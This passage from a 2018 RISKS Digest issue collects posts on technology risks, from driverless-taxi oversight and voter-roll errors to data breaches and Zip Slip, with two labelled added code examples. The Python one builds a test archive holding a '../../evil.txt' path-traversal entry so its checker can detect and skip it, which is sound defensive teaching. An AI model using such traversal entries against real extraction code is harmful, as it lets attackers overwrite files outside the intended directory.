    (Charles Q. Choi)
    Having better risk-based analysis for your banks and credit cards
    (David Strom, Phil Smith III)
    Re: Securing Elections (Chris Drewe)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Mon, 11 Jun 2018 9:27:18 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Another risk of driverless cars

    NPR reported today that Waymo is buying a slew of cars to create a
    driverless taxi fleet with no human overseer required in the car. Emergency
    takeover would be done by a fleet of well-trained remote admin personnel,
    *via cell phone*.

    There seem to be some massive flaws in that reasoning. One is the need for
    real-time response. Another is unavailable cell-phone coverage.

    I recall the case of someone who used his cellphone to start his car at
    home, and then drove into Red Rock Canyon Park, parked, and later tried to
    start his car (with the presence of his cellphone). Unfortunately, he had
    left his wireless unlocking/starting dongle at home, and there was no cell
    coverage in the canyon. His wife climbed up out of the canyon, called a
    neighbor who could get the remote dongle out of their house, and bring it to
    them so that they could drive home.

    Just one more example of short-sightedness and lack of awareness...

    ------------------------------

    Date: Wed, 06 Jun 2018 19:44:30 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Emirates looks to windowless planes (bbc.com)



    Aviation safety expert Professor Graham Braithwaite of Cranfield University:

    ``Cabin crew need to be able to see outside the aircraft if there is an
    emergency. Being able to see outside the aircraft in an emergency is
    important, especially if an emergency evacuation has to take place. Flight
    attendants would need to check outside the aircraft in an emergency, for
    example for fire, before opening a door and commencing an evacuation - and
    anything that needed power to do this may not be easy to get certified by
    an aviation safety regulator.'' Prof Braithwaite said the main obstacle
    in a windowless aircraft would be passenger perceptions of the
    technology.

    However, aviation regulator the European Aviation Safety Agency said: "We
    do not see any specific challenge that could not be overcome to ensure a
    level of safety equivalent to the one of an aircraft fitted with cabin
    windows."

    In addition to emergency evacuation slides, perhaps an emergency "peep hole"
    to supplement camera or screen failure?

    [Perhaps the pilots would not need windows either, because everything is
    computer controlled? PGN]

    ------------------------------

    Date: Wed, 6 Jun 2018 5:50:18 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: 180,000 Voters accidentally left off LA County polling place rosters
    (Irfan Khan)

    [Photo caption: Poll worker Shannon Diaz puts up signs as voting begins at El
    Mercado de Los Angeles in Boyle Heights on Tuesday. (Irfan Khan / Los Angeles
    Times)]

    If you are a registered voter in Los Angeles County and poll workers say
    they can't find your name on the roster at the polling place when you go to
    vote, don't worry -- you can still cast a provisional ballot.

    Some Angelenos needed a bit of reassurance that their votes would be counted
    in Tuesday's primary election after 118,522 voters' names were accidentally
    left off rosters due to a printing error, according to L.A. County
    Registrar Dean C. Logan.

    About 2.3% of L.A. County's 5.1 million registered voters and 35% of the
    county's 4,357 precincts were affected by the error, according to figures
    provided by the registrar-recorder/county clerk's office, which was still
    trying to determine the reason for the printing error. Voters whose names
    are missing are being encouraged to file provisional ballots, which are
    verified by vote counters later.

    118,522 voters accidentally left off Los Angeles County polling place rosters

    ------------------------------

    Date: Fri, 8 Jun 2018 16:42:48 -0400
    From: Tony Harminc <thar...@gmail.com>
    Subject: Ontario election results Not a Number

    Early in the counting for the Ontario provincial election on Thursday
    evening 2018-06-07, I noticed the CBC election site displayed this dynamic
    table of popular vote numbers:

    Party      Votes   Vote Share
    PC       389,435       40.45%
    NDP      333,475       34.63%
    LIB      174,446       18.12%
    GRN       48,022        4.99%
    OTH       17,467         NaN%

    The "NaN%" survived several on-the-fly updates to the numbers.

    When I checked on Friday morning, with final results in, the table was

    Party        Votes   Vote Share
    PC       2,322,422       40.63%
    NDP      1,925,574       33.69%
    LIB      1,103,283       19.30%
    GRN        263,987        4.62%
    OTH        100,058        1.75%

    It's not obvious to me why the first set of numbers should lead to a NaN for
    the "OTH" parties vote share rather than 1.81%. The page is still there at
    Ontario Election Results From CBC News if anyone cares to
    investigate the code, but I don't know how long it'll last. One trusts that
    this code is purely for display on the CBC website, and has nothing to do
    with actual vote tallying...

    In passing, this election was conducted with paper ballots hand marked and
    scanned by machine, with the ballots retained for hand recount if necessary,
    so pretty much Best Practice as I understand it. I don't believe any such
    recount has been called for.

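    An added example (not CBC's code and not the poster's) of how a "NaN%" can reach a results table and how strict input validation keeps it out. The vote counts are the early figures quoted above; the assumed cause is one row arriving as the formatted string "17,467" while the total comes from a separate field, which is why only that row would render as NaN.

```javascript
// Added example, not CBC's code. Constructed feed: four rows arrive as numbers,
// the OTH row arrives as display text "17,467" (assumed cause, not verified).
const EARLY_COUNT = [
  { party: 'PC',  votes: 389435 },
  { party: 'NDP', votes: 333475 },
  { party: 'LIB', votes: 174446 },
  { party: 'GRN', votes: 48022 },
  { party: 'OTH', votes: '17,467' },
];
const EARLY_TOTAL = 962845; // sum of the five counts above, supplied separately

// Naive version: Number('17,467') is NaN, and NaN passes through the division
// and toFixed() unchallenged, so that row renders as "NaN%" on every refresh.
// The other rows survive only because the total is not derived from the rows.
function naiveShares(rows, total) {
  return rows.map((r) => ({
    party: r.party,
    share: (Number(r.votes) / total * 100).toFixed(2) + '%',
  }));
}

// Hardened version: accept a non-negative integer or a digits-with-thousands-
// separators string, reject anything else loudly, derive the total from the
// validated rows, and never format a value that is not a finite number.
const COUNT_RE = /^(?:\d{1,3}(?:,\d{3})+|\d+)$/;

function parseVoteCount(value) {
  if (Number.isSafeInteger(value) && value >= 0) return value;
  if (typeof value === 'string' && COUNT_RE.test(value)) {
    return Number(value.replace(/,/g, ''));
  }
  throw new TypeError(`invalid vote count: ${JSON.stringify(value)}`);
}

function formatShare(fraction) {
  if (!Number.isFinite(fraction)) {
    throw new RangeError(`non-finite share: ${fraction}`);
  }
  return (fraction * 100).toFixed(2) + '%';
}

function validatedShares(rows) {
  const counts = rows.map((r) => ({ party: r.party, votes: parseVoteCount(r.votes) }));
  const total = counts.reduce((acc, r) => acc + r.votes, 0);
  if (total === 0) throw new RangeError('no votes counted yet');
  return counts.map((r) => ({ party: r.party, share: formatShare(r.votes / total) }));
}

// Small lookup helper so callers can ask for one party's rendered share.
function shareOf(result, party) {
  return result.find((r) => r.party === party).share;
}

console.log(naiveShares(EARLY_COUNT, EARLY_TOTAL));   // OTH share: 'NaN%'
console.log(validatedShares(EARLY_COUNT));            // OTH share: '1.81%'
```

    With validation in place a malformed feed field fails the whole render rather than leaking a NaN into the page, which is the behaviour one would want from anything closer to tallying than a display widget.
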
    ------------------------------

    Date: Tue, 12 Jun 2018 11:52:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Florida skips gun background checks for a year after employee
    forgets login (Naked Security)

    In Florida, the site of recent mass shootings such as at the Stoneman
    Douglas High School and the Pulse nightclub, more than a year went by in
    which the state approved applications without carrying out background
    checks. This meant the state was unaware if there was a cause to refuse a
    licence to allow somebody to carry a hidden gun -- for example, mental
    illness or drug addiction.

    The reason is dismayingly banal: an employee couldn't remember her login.

    Florida skips gun background checks for a year after employee forgets login

    ------------------------------

    Date: Mon, 11 Jun 2018 16:04:31 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: All accredited journalists at the #KimTrumpSummit get a free USB fan
    (YCombinator)

    [Nothing to worry about!]
    https://news.ycombinator.com/item?id=17285062

    Oh yeah. Just plug it into your computer. For sure.

    ------------------------------

    Date: Tue, 12 Jun 2018 13:01:51 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Israelis nabbed in Philippines are tip of iceberg in alleged fraud
    gone global (The Times of Israel)

    As police raid Israeli-operated boiler rooms in Asia and Eastern Europe,
    local law enforcement has yet to indict a single operative from an industry
    that has stolen billions

    Israelis nabbed in Philippines are tip of iceberg in alleged fraud gone global

    ------------------------------

    Date: Mon, 11 Jun 2018 17:53:32 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Sweden Tries to Halt Its March to Total Cashlessness (Bloomberg)

    via NNSquad
    Sweden Tries to Halt Its March to Total Cashlessness

    The move is a response to Sweden's rapid transformation as it becomes one
    of the most cashless societies in the world. That's led to concerns that
    some people are finding it increasingly difficult to cope without access
    to mobile phones or bank cards. There are also fears around what would
    happen if the digital payments systems suddenly crashed.

    ------------------------------

    Date: Mon, 11 Jun 2018 21:59:28 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Cryptocurrencies Lose Billions In Value After An Exchange Is Hacked
    (NPR)

    Coinrail virtual currency exchange was breached, and lost only $40M.
    Ethereum dropped, and the end result was an estimated $40B lost over the
    weekend to cryptocurrencies overall. (PGN-ed)
    https://www.npr.org/2018/06/11/6189...billions-in-value-after-an-exchange-is-hacked

    ------------------------------

    Date: Fri, 08 Jun 2018 20:23:45 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cryptocurrency theft malware is now an economy worth millions"
    (Charlie Osborne)

    Charlie Osborne for Zero Day (7 Jun 2018)
    Carbon Black research suggests that as interest in cryptocurrency rises,
    so does the market for weapons to steal it.
    https://www.zdnet.com/article/cryptocurrency-theft-malware-is-now-an-economy-worth-millions/

    selected text:

    The researchers estimate that over the past six months alone, a total of
    $1.1 billion has been stolen in cryptocurrency-related thefts, and
    approximately 12,000 marketplaces in the underbelly of the Internet are
    fueling this trend.

    In total, there are roughly 34,000 products and services on sale that are
    related to cryptocurrency theft, ranging from just over a dollar in price to
    $224, with an average cost of around $10.

    "The available dark web marketplaces represent a $6.7 million illicit
    economy built from cryptocurrency-related malware development and sales,"
    the researchers say.

    ------------------------------

    Date: Sun, 10 Jun 2018 18:06:14 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Quebec Halts Bitcoin Mining Power Requests Amid Booming Demand
    (Bloomberg)

    Hydro-Quebec will temporarily stop processing requests from cryptocurrency
    miners so that it can continue to fulfill its obligations to supply
    electricity to the entire province.

    Canada's biggest electric utility is facing unprecedented demand from
    blockchain companies that exceeds Hydro-Quebec's short- and medium-term
    capacity, according to a statement Thursday. In the coming days,
    Hydro-Quebec will file an application to the province's energy regulator
    proposing a selection process for blockchain industry projects.

    Hydro-Quebec has been courting cryptocurrency miners in recent months in a
    bid to soak up surplus energy from dams in northern Quebec. Power rates in
    the province are the lowest in North America, both for consumers and
    industrial customers.

    https://www.msn.com/en-us/news/mark...power-requests-amid-booming-demand/ar-AAylZv3

    Always risky, getting what you want.

    Then, there's this...
    https://techcrunch.com/2018/06/08/ibms-new-summit-supercomputer-for-the-doe-delivers-200-petaflops/

    ...which one commenter somewhere suggests should be used to mine bitcoins.
    Besides petaflop ratings, we need potential kWh/bitcoin comparisons.

    ------------------------------

    Date: Sun, 10 Jun 2018 21:01:19 -0400
    From: Jose Maria Mateos <ch...@rinzewind.org>
    Subject: The Spanish Liga uses the phone microphone of millions of fans
    to spy on bars (El Diario)

    Original article (in Spanish):
    https://www.eldiario.es/tecnologia/Liga-Futbol-microfono-telefono-aficionados_0_780772124.html

    Automated translation:
    https://translate.google.com/transl...lefono-aficionados_0_780772124.html&edit-text

    The Liga de Fútbol Profesional, the body that runs the most important
    sports competition in Spain, is using mobile phones of football fans to spy
    on bars and other public establishments that put matches for their
    clients. Millions of people in Spain have this application on their phone,
    which accumulates more than 10 million downloads, according to data from
    Google and Apple.

    All of these people can become undercover informants for La Liga and the
    owners of football television broadcasting rights. If they give their
    consent for the app to use the device's microphone (which is common in many
    applications), they are actually giving permission for La Liga to remotely
    activate the phone's microphone and try to detect whether what it hears
    sounds like a bar or public establishment where a football match is being
    projected without paying the fee established by the chains that own the
    broadcasting rights. In addition, it uses the geolocation of the phone to
    locate exactly where that establishment is located.

    ------------------------------

    Date: Fri, 8 Jun 2018 17:10:09 -0400
    From: Mark Rockman <user...@mdrsesco.biz>
    Subject: Navy Contractor Hacked: Reams of Secret Documents Taken (WashPo)

    *The Washington Post* reports "Chinese government hackers have compromised
    the computers of a Navy contractor, stealing massive amounts of highly
    sensitive data related to undersea warfare - including secret plans to
    develop a supersonic anti-ship missile for use on U.S. submarines by 2020,
    according to American officials." Gee. Do you think connecting secret
    documents to the Internet is wise? Good thing the Manhattan Project only
    had a Russian spy in their midst. Otherwise the Soviets may have stolen
    nuclear secrets and got the bomb before 1949.

    https://www.washingtonpost.com/worl...8eb28bc52b1_story.html?utm_term=.e6cf621eb36c

    [Also noted by Jose Maria Mateos. PGN]

    ------------------------------

    Date: Thu, 7 Jun 2018 07:50:14 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: G Suite leaks in 10,000+ orgs: Google UX blamed, fury at no-bug
    defense (TechBeacon)

    via NNSquad
    https://techbeacon.com/g-suite-leaks-10000-orgs-google-ux-blamed-fury-no-bug-defense

    People keep misconfiguring G Suite to leak their companies' private
    data. An estimated 10,000 or more organizations are affected. Google
    denies it's a bug, passive-aggressively telling people to RTFM. But that's
    not the point, is it? Given the scale of the problem, shouldn't la GOOG be
    fixing an obvious admin UX problem?

    When you blame the users in situations like this, you've already lost the
    argument.

    ------------------------------

    Date: Fri, 08 Jun 2018 20:28:37 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Password reset flaw at Internet giant Frontier allowed account
    takeovers" (Zack Whittaker)

    Zack Whittaker for Zero Day (8 Jun 2018)
    Password reset flaw at Internet giant Frontier allowed account takeovers
    A two-factor code used to reset an account password could be easily bypassed.
    https://www.zdnet.com/article/password-reset-flaw-at-frontier-allowed-account-takeovers/

    opening text:

    A bug in how cable and Internet giant Frontier reset account passwords
    allowed anyone to take over user accounts.

    The vulnerability, found by security researcher Ryan Stevenson, allows a
    determined attacker to take over an account with just a username or email
    address. With a few hours' worth of determination, an attacker can bypass
    the access code sent during the password reset process.

    ------------------------------

    Date: Mon, 11 Jun 2018 10:04:32 -0600
    From: "Matthew Kruk" <mkr...@gmail.com>
    Subject: Why a DNA data breach is much worse than a credit card leak
    (The Verge)

    https://www.theverge.com/2018/6/6/17435166/myheritage-dna-breach-genetic-privacy-bioethics

    ------------------------------

    Date: Fri, 08 Jun 2018 20:31:02 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Facebook gave some companies extended access to user data"
    (Stephanie Condon)

    Stephanie Condon for Between the Lines (ZDNet), 8 Jun 2018
    Facebook's acknowledgement of these agreements is the latest incident to
    shed light on the way the company has shared user data in ways users are
    unlikely to understand.
    https://www.zdnet.com/article/facebook-gave-some-companies-extended-access-to-user-data/

    opening text:

    In the latest revelation about Facebook's data-sharing practices, the social
    media giant acknowledged Friday that it gave certain companies extended,
    special access to user data in 2015 -- data that was already off limits to
    most developers.

    ------------------------------

    Date: Thu, 7 Jun 2018 13:39:07 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Facebook bug made up to 14 million users' posts public for days
    (WiReD)

    via NNSquad
    https://www.wired.com/story/facebook-bug-14-million-users-posts-public/

    FACEBOOK HAS FOUND itself the subject of another privacy scandal, this
    time involving privacy settings. A glitch caused up to 14 million Facebook
    users to have their new posts inadvertently set to public, the company
    revealed Thursday.

    "Private" posts that turned out to be public. Pretty much a worst case
    scenario.

    ------------------------------

    Date: Fri, 08 Jun 2018 20:21:00 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cisco fixes critical bug that exposed networks to hackers"
    (Zack Whittaker)

    Zack Whittaker, ZDNet, 7 Jun 2018
    The bug had a rare 9.8 out of 10 score on the common vulnerability
    severity rating scale.
    https://www.zdnet.com/article/cisco-fixes-critical-bug-that-exposed-networks-to-hackers/

    opening text:

    A "critical"-rated bug in one of Cisco's network access management devices
    could have allowed hackers to remotely break into corporate networks.

    ------------------------------

    Date: Fri, 08 Jun 2018 20:34:03 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Meet Norman, the world's first 'psychopathic' AI"
    (Charlie Osborne)

    Charlie Osborne for Between the Lines (ZDNet) 7 Jun 2018
    While you see flowers, Norman sees gunfire.
    https://www.zdnet.com/article/meet-norman-the-worlds-first-psychopathic-ai/

    selected text:

    Researchers at the Massachusetts Institute of Technology (MIT) have
    developed what is likely a world first -- a "psychopathic" artificial
    intelligence (AI).

    Norman is an AI system trained to perform image captioning, in which deep
    learning algorithms are used to generate a text description of an image.

    However, after plundering the depths of Reddit and a select subreddit
    dedicated to graphic content brimming with images of death and destruction,
    Norman's datasets are far from what a standard AI would be exposed to.

    The results are disturbing, to say the least.

    In one inkblot test, a standard AI saw "a black and white photo of a red and
    white umbrella," while Norman saw "man gets electrocuted while attempting to
    cross busy street."

    ------------------------------

    From: Richard M Stein <rms...@ieee.org>
    Date: Tue, 5 Jun 2018 06:21:03 -0700
    Subject: Should We Always Trust What We See in Satellite Images?
    (Scientific American)

    https://www.scientificamerican.com/article/should-we-always-trust-what-we-see-in-satellite-images/

    The author argues that an "on the ground" confirmation is a wise precaution
    to verify imagery content. Image processing algorithms can render misleading
    impressions which affect major decisions.

    "One example of the misuse of remotely sensed data was in 2003, when
    satellite images were used as evidence of sites of weapons of mass
    destruction in Iraq. These images revealed what were identified as active
    chemical munitions bunkers and areas where earth had been graded and moved
    to hide evidence of chemical production. This turned out not to be the
    case."

    "Trust but verify" remains a wise precaution to follow when analyzing
    satellite imagery.

    ------------------------------

    Date: Tue, 12 Jun 2018 13:20:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The NSA Just Released 136 Historical Propaganda Posters
    (Motherboard)

    https://motherboard.vice.com/en_us/article/43548d/nsa-historical-propaganda-posters-foia

    ------------------------------

    Date: Fri, 08 Jun 2018 06:56:43 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Unproven facial-recognition companies target schools, promising an
    end to shootings (WashPo)

    http://www.washingtonpost.com/busin...ory.html?noredirect=on&utm_term=.3fccfa98bcd2

    "Although facial recognition remains unproven as a deterrent to school
    shootings, the specter of classroom violence and companies intensifying
    marketing to local education officials could cement the more than 130,000
    public and private schools nationwide as one of America's premier testing
    grounds -- both for the technology's abilities and for public acceptance
    of a new generation of mass surveillance."

    Mass shootings at schools in the US, while statistically rare compared to
    other gun-related deaths (suicide, for instance), are horrifying events. A
    set of companies are pitching facial recognition technology as a bromide and
    deterrent, though they are coy to explain how their software stacks function
    or enable deterrence. Exploiting fear and anxiety is a long-practiced sales
    technique.

    ------------------------------

    Date: Wed, 6 Jun 2018 20:30:31 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: The Zip Slip vulnerability: what you need to know (Naked Security)

    Thanks to SRI's Steven Cheung for spotting this one.

    A fun vulnerability that uses zip files to overwrite files

    https://nakedsecurity.sophos.com/2018/06/06/the-zip-slip-vulnerability-what-you-need-to-know/
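    Zip Slip is the archive-extraction traversal pattern in which an entry named
    with "../" components (or an absolute path) is joined onto the extraction
    directory without any check, so the written file lands outside it. The
    Python below is an added example, not code from the Naked Security article:
    it builds a constructed archive containing one such entry, shows the unsafe
    join, and shows the resolve-and-compare check that rejects entries escaping
    the destination.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path
from typing import List

# Constructed sample archive (not taken from the article): one benign entry and
# one whose name carries "../" components, the pattern Zip Slip relies on.
SAMPLE_ENTRIES = {
    "docs/readme.txt": b"harmless content\n",
    "../../evil.txt": b"would land outside the extraction directory\n",
}


def build_sample_zip() -> bytes:
    """Create the constructed archive in memory and return its bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in SAMPLE_ENTRIES.items():
            zf.writestr(name, data)
    return buf.getvalue()


def naive_target(dest: str, name: str) -> Path:
    """The vulnerable pattern: destination + entry name, no validation."""
    return Path(dest) / name


def is_within(dest: str, candidate: Path) -> bool:
    """True if candidate, after collapsing '..', is dest or lies under it."""
    dest_r = Path(dest).resolve()
    cand_r = candidate.resolve()  # non-strict: works for paths that don't exist yet
    return cand_r == dest_r or dest_r in cand_r.parents


def find_unsafe_entries(zip_bytes: bytes, dest: str) -> List[str]:
    """Return entry names that would escape dest if extracted naively."""
    unsafe = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Absolute paths and drive letters escape too; Path join would
            # silently discard dest, so test them before the join.
            if os.path.isabs(name) or os.path.splitdrive(name)[0]:
                unsafe.append(name)
            elif not is_within(dest, naive_target(dest, name)):
                unsafe.append(name)
    return unsafe


def safe_extract(zip_bytes: bytes, dest: str) -> List[str]:
    """Extract only entries that stay under dest; return the names written."""
    Path(dest).mkdir(parents=True, exist_ok=True)
    unsafe = set(find_unsafe_entries(zip_bytes, dest))
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename in unsafe:
                continue  # traversal entry: skip rather than write it
            target = naive_target(dest, info.filename)
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written


def demo_safe_extract() -> List[str]:
    """Extract the constructed archive into a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return safe_extract(build_sample_zip(), os.path.join(tmp, "out"))


if __name__ == "__main__":
    print("unsafe:", find_unsafe_entries(build_sample_zip(), "/tmp/zipslip-demo"))
    print("written:", demo_safe_extract())
```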

    ------------------------------

    Date: Fri, 8 Jun 2018 12:29:03 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: All the people Apple just pissed off to better protect your privacy
    (Fast Company)

    When Apple previewed the upcoming iOS 12 and MacOS Mojave at this week's
    WWDC keynote,
    http://www.fastcompany.com/40578098/watch-apple-wwdc-livestream-live-coverage

    The killer new features that got both developers and users most excited were
    the ones you'd expect: the visually stunning Dark Mode on MacOS, the
    insanely customizable Memojis on iOS, FaceTime group-calling features on
    both platforms, massive improvements to Siri, and Apple's all-new Screen
    Time digital health tracking tools.

    <http://www.fastcompany.com/40580992/macos-mojave-brings-dark-mode-better-privacy-and-more-ios-ideas>
    <http://www.fastcompany.com/40580906/apples-latest-animoji-you>
    <http://www.fastcompany.com/40580873/siri-wants-to-automate-your-life-with-shortcuts>
    <http://www.fastcompany.com/40581638...ome-real-responsible-use-features-but-why-now>

    All those features deserved the applause they got from the crowd. But it
    was other updates -- definitely less sexy and headline-grabbing -- that set
    Apple apart from other technology giants. I'm talking about the new privacy
    features built into both iOS 12 and MacOS Mojave that make it so much harder
    for other parties to get at your personal information.
    https://www.fastcompany.com/4058169...ust-pissed-off-to-better-protect-your-privacy

    ------------------------------

    Date: Fri, 8 Jun 2018 13:40:11 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Recounting 'Horror Stories' Over Guitar Center's Warranties (NYT)

    https://www.nytimes.com/2018/06/07/business/guitar-center-warranty.html

    Former employees and customers at the giant music retailer described
    problems with how it sells protection plans, particularly in Puerto Rico.

    ------------------------------

    Date: Fri, 8 Jun 2018 13:41:23 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Add Bryan Colangelo to the long list who have been burned by social
    media (ESPN)

    http://www.espn.com/nba/story/_/id/...-line-sports-figures-run-trouble-social-media

    ------------------------------

    Date: Tue, 5 Jun 2018 10:27:01 -0400
    From: John Ohno <john...@gmail.com>
    Subject: Microsoft, Github, & distributed revision control (Medium)

    Originally posted here:
    https://medium.com/%40enkiv2/microsoft-github-and-distributed-revision-control-c563b5e98d17

    Microsoft, Github, and distributed revision control

    People legitimately criticize Github for creating artificial centralization
    of open source software & having a dysfunctional internal culture, and for
    being a for-profit company. Microsoft's acquisition may not make any of
    these things worse, & won't make them better. But, there's a really specific
    & practical reason people not already boycotting github have begun to
    consider it in response to the Microsoft acquisition: Microsoft's history of
    using deals, acquisitions, & standards committees as anticompetitive tools.

    Github was never going to do much of anything beside host your projects, and
    since hosting your projects is its main business, it's not going to do nasty
    things like delete them. Microsoft, however, is absolutely willing to do
    that kind of thing if they decide they can get away with it. History bears
    this out -- some of it recent. Microsoft hasn't been able to do it to the
    likes of IBM or Netscape since the 90s, but only because their complacency
    over the PC market has prevented them from being able to successfully branch
    out into phones or servers; however, they have been happily performing their
    embrace-extend-exterminate tactic on open source projects for the past
    fifteen years.

    (Note: If Github got as big as Microsoft & had side hustles as profitable,
    they would do the same thing. This isn't about particular organizations
    being evil -- capitalism forces organizations to act unethically and
    illegally by punishing those unwilling to break the law.)

    People concerned about open source software distribution being centralized
    under the aegis of unreliable for-profit companies have been boycotting
    Github & Gitlab for years, and Google Code and Sourceforge before that.
    They've also been working on alternatives to central repositories.

    Named data networking goes beyond simply ensuring that the owner of the
    hostname is not a for-profit company (liable to throw out your data as soon
    as they decide that it'll make them money to do so). Instead, DNS as a
    single point of failure goes away entirely, along with reliance on data
    centers.

    If you're considering migrating away from Github -- even if the recent news
    merely reminded you of problems Github has had for years -- take this
    opportunity to migrate your repository to git-ssb or git-ipfs, instead of
    moving to another temporary host-tied third party thing like gitlab or
    bitbucket. Your commits are already identified by hashes, so why not switch
    to hashes entirely & use an NDN/DHT system? That way, there's no third party
    that could take down your commits if it goes down. The entire DNS system
    could die permanently & it wouldn't interrupt your development.

    ------------------------------

    Date: Mon, 11 Jun 2018 16:54:09 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: How the body could power pacemakers and other implantable devices
    (Charles Q. Choi)

    [From ocean wave motions to lungs! Great idea. PGN]

    Charles Q. Choi, *The Washington Post*, 9 Jun 2018
    http://www.washingtonpost.com/natio...d287b0-5559-11e8-a551-5b648abe29ef_story.html

    In I Sing the Body Electric, poet Walt Whitman waxed lyrically about the
    action and power of beautiful, curious, breathing, laughing flesh. More
    than 150 years later, MIT materials scientist and engineer Canan Dagdeviren
    and colleagues are giving new meaning to Whitman's poem with a device that
    can generate electricity from the way it distorts in response to the beating
    of the heart.

    Despite tremendous technological advances, a key drawback of most wearable
    and implantable devices is their batteries, whose limited capacities
    restrict their long-term use. The last thing you want to do when a pacemaker
    runs out of power is to open up a patient just for battery replacement.

    The solution may rest inside the human body -- rich in energy in its
    chemical, thermal and forms.

    The bellows-like motions that a person makes while breathing, for example,
    can generate 0.83 watts of power; the heat from a body, up to 4.8 watts; and
    the motions of the arms, up to 60 watts. That's not nothing when you
    consider that a pacemaker needs just 50 millionths of a watt to last for
    seven years, a hearing aid needs a thousandth of a watt for five days, a
    smartphone requires one watt for five hours.

    Increasingly, Dagdeviren and others are investigating a plethora of ways
    that devices could make use of these inner energy resources and are testing
    such wearable or implantable devices in animal models and people.

    Good vibrations

    One energy-harvesting strategy involves converting energy from vibrations,
    pressure and other mechanical stresses into electrical energy. This
    approach, producing what is known as piezoelectricity, is often used in
    loudspeakers and microphones.

    To take advantage of piezoelectricity, Dagdeviren and colleagues have
    developed flat devices that can be stuck onto organs and muscles such as the
    heart, lungs and diaphragm. Their mechanical properties are similar to
    whatever they are laminated onto, so they don't hinder those tissues when
    they move.

    So far, such devices have been tested in cows, sheep and pigs, animals with
    hearts roughly the same size as those of people. ``When these devices
    mechanically distort, they create positive and negative charges, voltage and
    current -- and you can collect this energy to recharge batteries. You can
    use them to run biomedical devices like cardiac pacemakers instead of
    changing them every six or seven years when their batteries are depleted.''

    Scientists are also developing wearable piezoelectric energy harvesters that
    can be worn on joints such as the knee or elbow, or in shoes, trousers or
    underwear. People could generate electricity for electronics whenever they
    walk or bend their arms.

    Body heat

    A different energy-harvesting approach uses thermoelectric materials to
    convert body heat to electricity. ``Your heart beats more than 40 million
    times a year,'' Dagdeviren notes. All that energy is dissipated as heat in
    the body -- it's a rich potential source to capture for other uses.

    Thermoelectric generators face key challenges. They rely on temperature
    differences, but people usually keep a fairly constant temperature
    throughout their bodies, so any temperature differences found within are
    generally not dramatic enough to generate large amounts of electricity. But
    this is not a problem if the devices are exposed to relatively cool air in
    addition to the body's continuous warmth.

    Scientists are exploring thermo-electric devices for wearable purposes, such
    as powering wristwatches. In principle, the heat from a human body can
    generate enough electricity to power wireless health monitors, cochlear
    implants and deep-brain stimulators to treat disorders such as Parkinson's
    disease.

    Static and dynamic

    Scientists have also sought to use the same effect behind everyday static
    electricity to power devices. When two different materials repeatedly
    collide with, or rub against, one another, the surface of one material can
    steal electrons from the other, accumulating a charge, a phenomenon known as
    triboelectricity. Nearly all materials, both natural and synthetic, are
    capable of creating triboelectricity, giving researchers a wide range of
    choices for designing gadgets.

    Nanotechnologist Zhong Lin Wang of Georgia Tech:

    ``The more I work with triboelectricity, the more exciting it gets, and
    the more applications it might have. I can see myself devoting the next
    20 years to it.''

    ------------------------------

    Date: Mon, 11 Jun 2018 11:58:20 -0500
    From: David Strom via WebInformant <webinf...@list.webinformant.tv>
    Subject: Having better risk-based analysis for your banks and credit cards

    David Strom's Web Informant, 11 Jun 2018
    [TNX to Gabe Goldberg]

    When someone tries to steal money from your bank or credit card accounts,
    these days it is a lot harder, thanks to a number of technologies. I
    recently personally had this situation. Someone tried to use my credit card
    on the other side of Missouri on a Sunday afternoon. Within moments, I got
    alerts from my bank, along with a toll-free number to call to verify the
    transactions. In the heat of the moment, I dialed the number and started
    talking to my bank's customer service representatives. Then it hit me: what
    if I were being phished? I told the person that I was going to call them
    back, using the number on the back of my card. Once I did, I found out I was
    talking to the right people after all, but still you can't be too careful.

    This heat-of-the-moment reaction is what the criminals count on, and how
    they prey on your heightened emotional state. In my case, I was well into my
    first call before I started thinking more carefully about the situation, so
    I could understand how phishing attacks can often work, even for experienced
    people.

    To help cut down on these sorts of exploits, banks use a variety of
    risk-based or adaptive authentication technologies that monitor your
    transactions constantly, to try to figure out if it really is you doing them
    or someone else. In my case, the pattern of life didn't fit, even though it
    was a transaction taking place only a few hundred miles away from where I
    lived. Those of you who travel internationally probably have come across
    this situation: if you forget to tell your bank you are traveling, your
    first purchase in a foreign country may be declined until you call them and
    authorize it. But now the granularity of what can be caught is much finer,
    which was good news for me.

    These technologies can take several forms: some of them are part of identity
    management tools or multi-factor authentication tools, others come as part
    of regular features of cloud access security brokers. They aren't
